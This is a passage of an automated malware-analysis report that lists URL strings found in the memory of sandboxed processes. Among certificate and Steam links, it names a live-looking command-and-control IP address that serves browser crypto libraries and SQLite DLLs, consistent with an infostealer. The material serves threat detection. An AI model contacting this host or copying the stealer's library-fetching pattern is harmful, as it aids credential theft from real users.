Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000002.00000000.2038509404.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2038509404.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: explorer.exe, 00000002.00000000.2038509404.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2038509404.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000083C000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.3023498282.000000000084E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: explorer.exe, 00000002.00000000.2038509404.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2038509404.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://ocsp.digicert.com0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000002.00000000.2038509404.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 5358.exe, 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000000.2672680740.00000000004B4000.00000002.00000001.01000000.00000008.sdmp, kat2225.tmp.8.dr String found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
Source: explorer.exe, 00000002.00000000.2037923466.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2037895946.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2037402622.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: explorer.exe, 00000002.00000000.2042908810.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2042908810.000000000C81C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: kat2225.tmp, kat2225.tmp, 00000009.00000002.3206547696.000000006F8FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192617927.000000001B9BD000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: 76561199689717899[1].htm.9.dr String found in binary or memory: https://65.109.242.59
Source: kat2225.tmp, 00000009.00000003.2750844000.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2862103899.000000000084D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/
Source: kat2225.tmp, 00000009.00000003.2985489790.0000000000867000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/42.59ine
Source: kat2225.tmp, 00000009.00000003.2985940074.00000000007D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/?
Source: kat2225.tmp, 00000009.00000003.2822767715.000000000084E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/B
Source: kat2225.tmp, 00000009.00000003.3023498282.000000000084E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/F
Source: kat2225.tmp, 00000009.00000003.2847534612.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848187053.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2822767715.000000000084E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/K
Source: kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/L
Source: kat2225.tmp, 00000009.00000003.3023498282.000000000084E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/O
Source: kat2225.tmp, 00000009.00000003.3023498282.000000000084E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/P
Source: kat2225.tmp, 00000009.00000003.2822767715.000000000084E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/T;
Source: kat2225.tmp, 00000009.00000003.2880856339.000000000083C000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/freebl3.dll
Source: kat2225.tmp, 00000009.00000003.2880856339.000000000083C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/freebl3.dll2.59/freebl3.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/freebl3.dllZ
Source: kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/l3.dll
Source: kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/mo
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/mozglue.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/mozglue.dllF
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/mozglue.dllr
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/msvcp140.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/msvcp140.dlld
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/nss3.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/nss3.dll;
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/nss3.dllAppData
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2847534612.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848187053.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/p
Source: kat2225.tmp, 00000009.00000003.2766326619.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2719695430.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2735078163.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2750844000.00000000007FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/r
Source: kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2719695430.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.00000000007FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/s
Source: kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/sK
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/so
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/softokn3.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/softokn3.dll&
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/softokn3.dllel
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/softokn3.dllo0
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000052E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/sqls.dll
Source: kat2225.tmp, 00000009.00000002.3159795839.0000000000795000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/sqls.dll)
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/t
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985489790.0000000000861000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.00000000007F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dll?
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dllB
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dllD
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dllO
Source: kat2225.tmp, 00000009.00000003.2985940074.00000000007F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dllSessionKeyBackward
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dllT
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dllv
Source: kat2225.tmp, 00000009.00000003.2847534612.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848187053.000000000084D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/y
Source: kat2225.tmp, 00000009.00000003.2822767715.000000000084E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/~;
Source: kat2225.tmp, 00000009.00000002.3157954757.0000000000572000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59CAEH
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000052E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59CGII
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.2041938278.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.2036556348.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2038509404.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2036556348.0000000007637000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: explorer.exe, 00000002.00000000.2035970319.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: 76561199689717899[1].htm.9.dr String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
